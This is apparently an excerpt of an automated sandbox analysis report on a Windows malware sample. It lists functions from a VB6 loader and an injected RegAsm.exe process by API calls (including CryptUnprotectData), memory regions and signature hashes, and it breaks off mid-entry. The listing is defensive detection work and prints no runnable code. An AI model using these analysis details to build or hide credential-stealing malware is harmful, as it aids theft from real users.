Associated: 00000000.00000002.2741103945.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.2741140144.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresultNew2$Free$List
String ID:
API String ID: 191279167-0
Opcode ID: af9ef84a80d228475bad546c46447d4b0ec826e344e8ce2f01407274b1e61a57
Instruction ID: e2bf45a01232e38564c91f4aa144bbf560ca6d733d5f6e29a6809b8b24295894
Opcode Fuzzy Hash: af9ef84a80d228475bad546c46447d4b0ec826e344e8ce2f01407274b1e61a57
Instruction Fuzzy Hash: 3F711C74A10304DFCB10EFA9C989ADABBF8FF4C701B10856AE949E7361D7749841CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00413060, Relevance: 22.7, APIs: 15, Instructions: 154COMMON

Download Yara Rule

APIs

#714.MSVBVM60(?,?,00000000), ref: 004130B8
__vbaVarTstNe.MSVBVM60(?,?), ref: 004130D4
__vbaFreeVarList.MSVBVM60(00000002,00000005,?), ref: 004130E7
__vbaNew2.MSVBVM60(00410E7C,00415590), ref: 0041310B
__vbaHresultCheckObj.MSVBVM60(00000000,02AD004C,00410E6C,00000014), ref: 00413136
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410E8C,000000C0), ref: 00413164
__vbaFreeObj.MSVBVM60 ref: 0041316F
__vbaNew2.MSVBVM60(00410E7C,00415590), ref: 00413184
__vbaHresultCheckObj.MSVBVM60(00000000,02AD004C,00410E6C,00000014), ref: 004131A9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410E8C,000000B8), ref: 004131CF
__vbaFreeObj.MSVBVM60 ref: 004131D4
__vbaNew2.MSVBVM60(00410E7C,00415590), ref: 004131E9
__vbaObjSetAddref.MSVBVM60(?,?), ref: 004131FF
__vbaHresultCheckObj.MSVBVM60(00000000,02AD004C,00410E6C,00000010), ref: 00413219
__vbaFreeObj.MSVBVM60 ref: 0041321E

Memory Dump Source

Source File: 00000000.00000002.2740959877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2740924424.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.2741103945.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.2741140144.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$New2$#714AddrefList
String ID:
API String ID: 169271594-0
Opcode ID: 2771ed1edade32e75d1b6bd7256fbca93c97bb7e79d66e3ad3fe38f0d4649862
Instruction ID: b9c9a7392339d7e53cb5298d7f7b5d488d836d75e56d77982184f20f97566c4c
Opcode Fuzzy Hash: 2771ed1edade32e75d1b6bd7256fbca93c97bb7e79d66e3ad3fe38f0d4649862
Instruction Fuzzy Hash: 23515070A00208EBDB10DFA5DD85BDEBBB9FB48701F20452AE545B31A1D7786A85CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00413510, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00411064,00415010), ref: 00413553
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0041356C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410E9C,000001B0), ref: 004135AF
__vbaFreeObj.MSVBVM60 ref: 004135B8

Memory Dump Source

Source File: 00000000.00000002.2740959877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2740924424.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.2741103945.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.2741140144.0000000000416000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID:
API String ID: 1645334062-0
Opcode ID: e8865ce886463921ee99acaccb5b3cc0d5bd117e47fd61107e8ff86a523f0f69
Instruction ID: 54b58749a863500e885ab0de34733081e730dbadc3fe16c905a1656fd622b6ce
Opcode Fuzzy Hash: e8865ce886463921ee99acaccb5b3cc0d5bd117e47fd61107e8ff86a523f0f69
Instruction Fuzzy Hash: 3B116370A00305EBC700EFA9C949BDABBB9FB4CB01F108529F545E7790D778A940CBA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 7080 Parent PID: 4904 RegAsm.exeCOMMON

Executed Functions

Function 0143C710, Relevance: 3.4, Instructions: 3354COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a8531298f81eb74f0d890ba32722df0b5a4c1b8e43be51462637e993487408
Instruction ID: 9a040dfbb71d09e9d6dc4d3a54cfd5bd3f6191a1c4374cf2777c000ff71c8b28
Opcode Fuzzy Hash: e9a8531298f81eb74f0d890ba32722df0b5a4c1b8e43be51462637e993487408
Instruction Fuzzy Hash: F9734030D107198EDB15DF68C88469AF7B1FF99310F15D69AE458AB221EB70EAC4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0143CCAF, Relevance: 2.8, Instructions: 2755COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fe98e7e97dbec927cacd85fa95dfe068e54ad83d12bf624b1a5f58f41ca136
Instruction ID: 7be71a8e2a73137906c228c36bc8cd434a006ed72b96238c97a8acf363d14f01
Opcode Fuzzy Hash: 26fe98e7e97dbec927cacd85fa95dfe068e54ad83d12bf624b1a5f58f41ca136
Instruction Fuzzy Hash: 8C53FE30D10B198EDB11EF68C88469AF7B1FF99304F55D69AE45877221EB70AAC4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 01434EB0, Relevance: 2.5, Strings: 1, Instructions: 1294COMMON

Download Yara Rule

Strings

$*l, xrefs: 01435794

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID: $*l
API String ID: 0-1064570385
Opcode ID: 9084bfe529ad8a0422a3eb87debe65abde167a459194574e1e5db1b449873db0
Instruction ID: f1e8a6c4edfe51f410fbc071a4d4e52d1191724dce14f492b397a16dffad1dc8
Opcode Fuzzy Hash: 9084bfe529ad8a0422a3eb87debe65abde167a459194574e1e5db1b449873db0
Instruction Fuzzy Hash: CCB28E34A042148FCB14DBB8C8987AEBBB2AFC9344F15846AD509DB365DF34ED46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01046950, Relevance: 2.5, APIs: 1, Instructions: 963libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 722ea43bff4d5501c77893cd324d5ccd83732d2cbcf396ff773a73c841371770
Instruction ID: 806ee74a4e0354a2c5214bca112fda9f8d0d41d5238339e39949d43697483a3f
Opcode Fuzzy Hash: 722ea43bff4d5501c77893cd324d5ccd83732d2cbcf396ff773a73c841371770
Instruction Fuzzy Hash: C0A239B4A04228CFCB64EF74C88869DB7B6BF89305F6080E9D54AA3354DB359E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 01435450, Relevance: 2.0, Strings: 1, Instructions: 734COMMON

Download Yara Rule

Strings

$*l, xrefs: 01435794

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID: $*l
API String ID: 0-1064570385
Opcode ID: 75ac709bbc2e4cd44e0e1ee6f40ae14f136f0d628a17831f9a58d26caf0d5797
Instruction ID: 495b6c8e189eca1ca6c3d5bcdb56609c02fb3139a2a9f5093ad858bb9fc22216
Opcode Fuzzy Hash: 75ac709bbc2e4cd44e0e1ee6f40ae14f136f0d628a17831f9a58d26caf0d5797
Instruction Fuzzy Hash: B3624B34A002148FCB54EBB4C8987AEBBB2AFC9344F158469D50AEB754DF34AD81CF95

Uniqueness

Uniqueness Score: -1.00%

Function 01476E10, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 01477675

Memory Dump Source

Source File: 0000000B.00000002.7350830923.0000000001470000.00000040.00000010.sdmp, Offset: 01470000, based on PE: false

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 8e99130cf7e4904f2aa9a7228ab64decac4ac025759492a715e215615245921e
Instruction ID: 493e49b169938f4ede4e904525e3028112ee50aec32d232c3ad44e1d5808325d
Opcode Fuzzy Hash: 8e99130cf7e4904f2aa9a7228ab64decac4ac025759492a715e215615245921e
Instruction Fuzzy Hash: A1113A718002499FCF10CF99C549BEEBFF4EF48324F14841AE658A7211C775A950CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01477608, Relevance: 1.6, APIs: 1, Instructions: 52encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 01477675

Memory Dump Source

Source File: 0000000B.00000002.7350830923.0000000001470000.00000040.00000010.sdmp, Offset: 01470000, based on PE: false

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 87f933f13703062fdb09117e2335a61db8004bed36a038d0c9b729980e2f3feb
Instruction ID: 851c88eab0d78c3618819ff644bccc4219e071521231f90920f744e850182271
Opcode Fuzzy Hash: 87f933f13703062fdb09117e2335a61db8004bed36a038d0c9b729980e2f3feb
Instruction Fuzzy Hash: C91167728002499FCB10CF99C948BDEBFF4EF48320F14841AE658A7260C339A550CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0143AD10, Relevance: 1.1, Instructions: 1102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d07dde5d82c85e5e0f280b4d33064125704a4e55f6cb4bd91bd29c5028018f5e
Instruction ID: 42224b8d42d5ad8c1d381f1724e7a2471aea4c2d07608e22361d7dec69fbbeda
Opcode Fuzzy Hash: d07dde5d82c85e5e0f280b4d33064125704a4e55f6cb4bd91bd29c5028018f5e
Instruction Fuzzy Hash: D3924A34A002188FDB64DF79C8587AEB6F2EFC9304F158469D90AAB3A0DF759D42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0143A318, Relevance: .7, Instructions: 707COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae2de5ad760090118665e49fd808cd0cdd89b717ccdb7ac8e1a8077f280c0637
Instruction ID: 849cd15be4a01c489723309d913f142cc5cfb4b0a2d2eda197ca471be2d3be33
Opcode Fuzzy Hash: ae2de5ad760090118665e49fd808cd0cdd89b717ccdb7ac8e1a8077f280c0637
Instruction Fuzzy Hash: 2B32AF35B042158FDB149BB8C8987AE77F2AF89214F24852AD946DB3A0DF78DC02C791

Uniqueness

Uniqueness Score: -1.00%

Function 01438C80, Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.7350284492.0000000001430000.00000040.00000010.sdmp, Offset: 01430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5132001bea7f9ed9e92eb977caf313773e6fe1ddd039784152c67eb7249e994
Instruction ID: 51e9382d75f923774ee19e23c7e41eb29f1b2403d31273e87fbff0a2aa42e96d
Opcode Fuzzy Hash: a5132001bea7f9ed9e92eb977caf313773e6fe1ddd039784152c67eb7249e994
Instruction Fuzzy Hash: 50F19035A002199FDB14DBB8C88869DBBF2AFC8354F258629D405EB3A5CB75EC41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1E0653F0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1E0657B6

Strings

\OM , xrefs: 1E0654B5
lMM , xrefs: 1E065565
\OM , xrefs: 1E0655CD

Memory Dump Source

Source File: 0000000B.00000002.7364772543.000000001E060000.00000040.00000001.sdmp, Offset: 1E060000, based on PE: false

Similarity

API ID: HandleModule
String ID: \OM $\OM $lMM
API String ID: 4139908857-767508554
Opcode ID: 0daa2faab95692e25c09cde772a99636691225b26494c65a9ff2a5a152b4ecd4
Instruction ID: 48d62d345eb13776392da277a5534a0934c57cde36608425b2f0de2975a80edc
Opcode Fuzzy Hash: 0daa2faab95692e25c09cde772a99636691225b26494c65a9ff2a5a152b4ecd4
Instruction Fuzzy Hash: C1C1CE74A047468FCB14DF79C494A6EBBF2FF89214B018A2ED846DB751DB34E805CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0147DB38, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0147DC97

Strings

LR*l, xrefs: 0147DCCE
LR*l, xrefs: 0147DD32

Memory Dump Source

Source File: 0000000B.00000002.7350830923.0000000001470000.00000040.00000010.sdmp, Offset: 01470000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: LR*l$LR*l
API String ID: 2994545307-2089012273
Opcode ID: 503a941f03bb1b59bd8a6a3bff4a1163ba4578ed9ba51c25de804279b89f23ec
Instruction ID: 7c2e824b5787bfef28eb656da5044ee80ffc59c97c53884e09ba3f1bcf3e41af
Opcode Fuzzy Hash: 503a941f03bb1b59bd8a6a3bff4a1163ba4578ed9ba51c25de804279b89f23ec
Instruction Fuzzy Hash: 4381D471B143458FCB019BB4C855AEE7BF1AF86304F1989AAD405DB3A2EB74DC0AC761

Uniqueness

Uniqueness Score: -1.00%

Function 0147DC38, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0147DC97

Strings

LR*l, xrefs: 0147DCCE
LR*l, xrefs: 0147DD32

Memory Dump Source

Source File: 0000000B.00000002.7350830923.0000000001470000.00000040.00000010.sdmp, Offset: 01470000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: LR*l$LR*l
API String ID: 2994545307-2089012273
Opcode ID: fa0a206441469b474b2c7c0e27e13181e8738f8b99a384d757b5b46e749b959b
Instruction ID: fafbc0b93d6be00dfafa58f9bb2347bdf38d4dbb9ec4153fd804e06694b3ff8a
Opcode Fuzzy Hash: fa0a206441469b474b2c7c0e27e13181e8738f8b99a384d757b5b46e749b959b
Instruction Fuzzy Hash: A2518371B002099BCB04EBB4C884AEEB7F5EF89214F15896AD502DB395DF70ED05CB55

Uniqueness

Uniqueness Score: -1.00%

Function 01001D74, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,01002A89,00000800), ref: 01002B1A

Strings

&M , xrefs: 01001D74

Memory Dump Source

Source File: 0000000B.00000002.7348540825.0000000001000000.00000040.00000001.sdmp, Offset: 01000000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: &M
API String ID: 1029625771-3272563696
Opcode ID: 029f23b80526a402cebb1ce5d4b77aa9b54e7aa8f65d00cb63b891fc69ffa575
Instruction ID: 1830ce029ef3135821f46b950f2bab32cad4de77ca950d32991559412e4b83a4
Opcode Fuzzy Hash: 029f23b80526a402cebb1ce5d4b77aa9b54e7aa8f65d00cb63b891fc69ffa575
Instruction Fuzzy Hash: 8B1114B2D042488FDB20CF9AD548B9EFBF4EF49310F14842AD955A7240C779A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01046971, Relevance: 2.1, APIs: 1, Instructions: 635libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b44c716d2f5ff994aca810963b2fa114b7d32067359f6f55bd9f522494c01274
Instruction ID: a1c992bfbdd8d91c92b7683b5c81d1ff28e6669ec424cd01c12fbebbdf821c19
Opcode Fuzzy Hash: b44c716d2f5ff994aca810963b2fa114b7d32067359f6f55bd9f522494c01274
Instruction Fuzzy Hash: 586218B4A04224CFCB65EF74C88869DB7B6BF89305F6080E9D54AA3344DB359E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 010469AF, Relevance: 2.1, APIs: 1, Instructions: 628libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a5d8e1593a3091600b72835f8190e9a187b0d0cb902cdca8ffb6e0b565286e2
Instruction ID: ef72e6a5c67c67a436d5fc3ae9e3091ae16f6cf56021ed2055add26a1c898c70
Opcode Fuzzy Hash: 8a5d8e1593a3091600b72835f8190e9a187b0d0cb902cdca8ffb6e0b565286e2
Instruction Fuzzy Hash: B16218B4A04224CFCB65EF74C88869DB7B6BF89305F6080E9D54AA3344DB359E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 010469ED, Relevance: 2.1, APIs: 1, Instructions: 623libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b288aa3711fc480b32dfec2ddbfe9a3b59e26ce2ef388d741ff7b910b7845f5f
Instruction ID: bed89f36c747d70fe1b22ea300103d8ad8e2f5f3e5d1b3b1205c4a37cc268c06
Opcode Fuzzy Hash: b288aa3711fc480b32dfec2ddbfe9a3b59e26ce2ef388d741ff7b910b7845f5f
Instruction Fuzzy Hash: 0D5218B4A04224CFCB64AF74C88869DB7B6BF89305F6080E9D54AA3354DB359E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 01046A34, Relevance: 2.1, APIs: 1, Instructions: 616libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 991d0efb8a4c17747abad06206f7af43b542e13e3bc6c1f869d74e10674b1583
Instruction ID: d857365166d787148a5f315b7a38d3771d4e6b0282e534c41ddcf45dfbd67f3f
Opcode Fuzzy Hash: 991d0efb8a4c17747abad06206f7af43b542e13e3bc6c1f869d74e10674b1583
Instruction Fuzzy Hash: 9C5208B4A04224CFCB64EF74C88869DB7B6BF89305F6080E9D54AA3344DB359E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 01046A7B, Relevance: 2.1, APIs: 1, Instructions: 609libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 01fcc0367481499907fe8ab57cc17fede66c7f3f736bf7a4cea00073f630a39b
Instruction ID: 974a120c01ad287f6e1343179611ae1b65bac011cbbec0e4818635dbc9e8f931
Opcode Fuzzy Hash: 01fcc0367481499907fe8ab57cc17fede66c7f3f736bf7a4cea00073f630a39b
Instruction Fuzzy Hash: 025208B4A04224CFCB64AF74C88869DB7B6BF89305F6080E9D54AA3354DB359E85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 01046AC2, Relevance: 2.1, APIs: 1, Instructions: 602libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e2cb14b3fd4849c19b7f1db15ad9546194023fd18ebd7069f990ce10edb7362e
Instruction ID: 247927b10e870e3b568b29e39b2d86a08080bb52bd7245c3eac6c47ceaca6576
Opcode Fuzzy Hash: e2cb14b3fd4849c19b7f1db15ad9546194023fd18ebd7069f990ce10edb7362e
Instruction Fuzzy Hash: 765208B4A04224CFCB64EF74C88869DB7B6BF89305F6080E9D54AA3354DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046B09, Relevance: 2.1, APIs: 1, Instructions: 595libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b2655c2bb8c06b0fbab343a3a24342babf4a3ce960c0e9157af526fe9e54cad7
Instruction ID: 3362ef0f80efc4eb04f87ee6c5cbeb39d81ad8b33852fdc45fd0ff4d755ea3df
Opcode Fuzzy Hash: b2655c2bb8c06b0fbab343a3a24342babf4a3ce960c0e9157af526fe9e54cad7
Instruction Fuzzy Hash: BB5208B4A04224CFCB64EF74C88869DB7B6BF89305F6080E9D54AA3354DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046B50, Relevance: 2.1, APIs: 1, Instructions: 588libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0fb0693ef4754f8911650d55e3daa839eaf3ac930857769523b726842109279c
Instruction ID: f68ebdfe73edf94379e34c8d96acaa23ee65488a1f548b2a08d0eec9a9f2e790
Opcode Fuzzy Hash: 0fb0693ef4754f8911650d55e3daa839eaf3ac930857769523b726842109279c
Instruction Fuzzy Hash: 935209B4A04224CFCB64EF74C88869DB7B6BF89305F6080E9D54AA3354DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046B97, Relevance: 2.1, APIs: 1, Instructions: 581libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 82db6a5d9fbf46b1203424126385c37464f5240cdb016c420c26a000902b591d
Instruction ID: 7fde9acc16c91186cb9b9ac78172ebbcb6f7047c42ef2015a4451ba6a9e03ad7
Opcode Fuzzy Hash: 82db6a5d9fbf46b1203424126385c37464f5240cdb016c420c26a000902b591d
Instruction Fuzzy Hash: DD5209B4A04224CFCB64EF74C88869DB7B6BF89305F6080E9D54AA3354DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046BDE, Relevance: 2.1, APIs: 1, Instructions: 572libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f380334b256f7773f9e76d735f738bd9df1734227cd6e67d804bf3f7ba787694
Instruction ID: f52c4d06e875322652632931376e5a1164d71b434fd4eb5007e2dea26d709aad
Opcode Fuzzy Hash: f380334b256f7773f9e76d735f738bd9df1734227cd6e67d804bf3f7ba787694
Instruction Fuzzy Hash: C14209B4A04224CFCB64EF74C88869DB7B6BF89305F6080E9D54AA3354DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046C1C, Relevance: 2.1, APIs: 1, Instructions: 567libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ae23dd30625243c87d3fbe43fdb0bc0479ffc10d5d56226829e98c32a6bcd6a
Instruction ID: 05102e484fdb9433f83d96e1c31c7ff383cd188591f7bc2872f81d4791144958
Opcode Fuzzy Hash: 4ae23dd30625243c87d3fbe43fdb0bc0479ffc10d5d56226829e98c32a6bcd6a
Instruction Fuzzy Hash: EE4209B4A04224CFCB64EF74C88869DB7B6BF89305F6080E9D54AA3354DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046C63, Relevance: 2.1, APIs: 1, Instructions: 560libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4b9825b7f638f17694a57fa3dd74457e7fab994e0c09931b95df1f3e086d1f59
Instruction ID: 8210a2e39ce9749bf2b9ff54d73ae519f4feb9b535d1439746f6869c540adffb
Opcode Fuzzy Hash: 4b9825b7f638f17694a57fa3dd74457e7fab994e0c09931b95df1f3e086d1f59
Instruction Fuzzy Hash: 034209B4A04224CFCB64EF74C88869DB7B6BF89305F6080E9D54AA3354DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046CAA, Relevance: 2.1, APIs: 1, Instructions: 553libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69b7ccda37d91f42938180b59448c42ce21b31ac906711059733ac8222bc283d
Instruction ID: 838243a20a45498b0dba7b41f8de97a5715b83bf9b683fb99a524de3d6e73458
Opcode Fuzzy Hash: 69b7ccda37d91f42938180b59448c42ce21b31ac906711059733ac8222bc283d
Instruction Fuzzy Hash: DD4209B4A04224CFCB64EF74C88869DB7B6BF89305F6080E9D54AA3354DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046CF1, Relevance: 2.0, APIs: 1, Instructions: 546libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e54a2b5b79112114f38e425d4e022ce7fb79e6613a9655ca98d5dc56ab6ad95d
Instruction ID: 89f8ec0dacd83b0486a472ec685990f2015ec4d3d297c374f54dc1143e45058a
Opcode Fuzzy Hash: e54a2b5b79112114f38e425d4e022ce7fb79e6613a9655ca98d5dc56ab6ad95d
Instruction Fuzzy Hash: 104209B4A04224CFCB64EF74C88869DB7B6BF89305F6480E9D54AA3344DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046D38, Relevance: 2.0, APIs: 1, Instructions: 539libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: df2da1c26ab0a69e1c1aa769e98cfa6d6f3abed4ad46429c18a66b85649a37f4
Instruction ID: 1ad3b3ef6355ba8fb69cf2d4fccfc48bfc8be6f0eafc0849340548a37920e191
Opcode Fuzzy Hash: df2da1c26ab0a69e1c1aa769e98cfa6d6f3abed4ad46429c18a66b85649a37f4
Instruction Fuzzy Hash: 164209B4A04224CFCB64EF74C88869DB7B6BF89305F6080E9D54AA3354DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046D7F, Relevance: 2.0, APIs: 1, Instructions: 532libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 73a9d702a54a5b14b755c8c5bfd7494cf65ff6c99e7df4469e2208e092158f82
Instruction ID: 43bfa01d6caf9d4fab61572cdbf97379ae4ced05d588e453a659366c32abe3a8
Opcode Fuzzy Hash: 73a9d702a54a5b14b755c8c5bfd7494cf65ff6c99e7df4469e2208e092158f82
Instruction Fuzzy Hash: F34208B4A04224CFCB64EF74C88869DB7B6BF89305F6480E9D54AA3344DB359E85CF49

Uniqueness

Uniqueness Score: -1.00%

Function 01046DC6, Relevance: 2.0, APIs: 1, Instructions: 525libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010473FD

Memory Dump Source

Source File: 0000000B.00000002.7348818252.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
